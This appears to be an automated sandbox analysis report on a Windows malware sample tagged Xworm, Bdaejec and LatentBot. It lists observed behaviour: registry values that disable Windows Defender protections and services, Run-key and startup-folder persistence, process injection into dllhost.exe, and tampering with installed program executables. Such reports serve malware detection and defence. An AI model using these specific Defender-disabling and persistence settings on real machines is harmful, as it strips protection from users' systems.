Malware Analysis Report

2025-05-28 17:58

Sample ID 250520-a2d3jshk4z
Target 250519-z3llfszks4.bin
SHA256 1ca064f8c8eb72cd0cfda466bb582318c93d2856a89bcf323b37d820f05fdc83
Tags
bdaejec latentbot xworm aspackv2 backdoor defense_evasion discovery evasion execution persistence privilege_escalation rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1ca064f8c8eb72cd0cfda466bb582318c93d2856a89bcf323b37d820f05fdc83

Threat Level: Known bad

The file 250519-z3llfszks4.bin was found to be: Known bad.

Malicious Activity Summary

bdaejec latentbot xworm aspackv2 backdoor defense_evasion discovery evasion execution persistence privilege_escalation rat trojan

Latentbot family

Detects Bdaejec Backdoor.

Contains code to disable Windows Defender

Bdaejec

Detect Xworm Payload

Modifies Windows Defender DisableAntiSpyware settings

Xworm

Suspicious use of NtCreateUserProcessOtherParentProcess

Bdaejec family

Xworm family

Modifies security service

LatentBot

Modifies Windows Defender Real-time Protection settings

Command and Scripting Interpreter: PowerShell

Modifies Windows Firewall

Executes dropped EXE

ASPack v2.12-2.42

Checks computer location settings

Checks BIOS information in registry

Drops startup file

Modifies Security services

Adds Run key to start application

Looks up external IP address via web service

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Program Files directory

Unsigned PE

Event Triggered Execution: Netsh Helper DLL

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious behavior: AddClipboardFormatListener

Enumerates system info in registry

Checks processor information in registry

Checks SCSI registry key(s)

Modifies data under HKEY_USERS

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of UnmapMainImage

Suspicious use of WriteProcessMemory

Scheduled Task/Job: Scheduled Task

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-05-20 00:42

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-05-20 00:42

Reported

2025-05-20 00:44

Platform

win10v2004-20250502-en

Max time kernel

150s

Max time network

143s

Command Line

winlogon.exe

Signatures

Bdaejec

backdoor bdaejec

Bdaejec family

bdaejec

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Bdaejec Backdoor.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

LatentBot

trojan latentbot

Latentbot family

latentbot

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A

Modifies security service

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 5232 created 616 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe
PID 4828 created 616 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Xworm

trojan rat xworm

Xworm family

xworm

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\x69.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69.lnk C:\Users\Admin\AppData\Roaming\x69.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69.lnk C:\Users\Admin\AppData\Roaming\x69.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69Disable-winDefender = "C:\\Users\\Admin\\AppData\\Roaming\\x69Disable-winDefender.exe" C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69install = "C:\\Users\\Admin\\AppData\\Roaming\\x69install.exe" C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69 = "C:\\Users\\Admin\\AppData\\Roaming\\x69.exe" C:\Users\Admin\AppData\Roaming\x69.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69 = "C:\\Users\\Admin\\AppData\\Roaming\\x69.exe" C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Modifies Security services

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" C:\Windows\system32\reg.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5232 set thread context of 5088 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4828 set thread context of 4480 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\jabswitch.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\SELFCERT.EXE C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files (x86)\Google\GoogleUpdater\134.0.6985.0\disabledupdater.exe C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\createdump.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\klist.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXMLED.EXE C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\SoundRec.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\klist.exe C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\rmid.exe C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.ShowHelp.exe C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exe C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\extcheck.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\kinit.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\native2ascii.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\unpack200.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\ssvagent.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\msoia.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PPTICO.EXE C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\XLICONS.EXE C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Windows Photo Viewer\ImagingDevices.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\policytool.exe C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\133.0.6943.60\notification_helper.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\7-Zip\Uninstall.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jcmd.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\wsimport.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javacpl.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\javaws.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\msoadfsb.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\rmiregistry.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\officeappguardwin32.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\GetHelp.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\LocalBridge.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\onenoteim.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\codecpacks.webp.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\policytool.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\nmhproxy.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\WhatsNew.Store.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\MixedRealityPortal.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\codecpacks.webp.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxIdentityProvider_12.50.6001.0_x64__8wekyb3d8bbwe\XboxIdp.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\pack200.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\tnameserv.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Microsoft Office\Office16\OSPPREARM.EXE C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\misc.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\PeopleApp.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\idlj.exe C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javaws.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\kinit.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\jabswitch.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\javacpl.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\java.exe C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
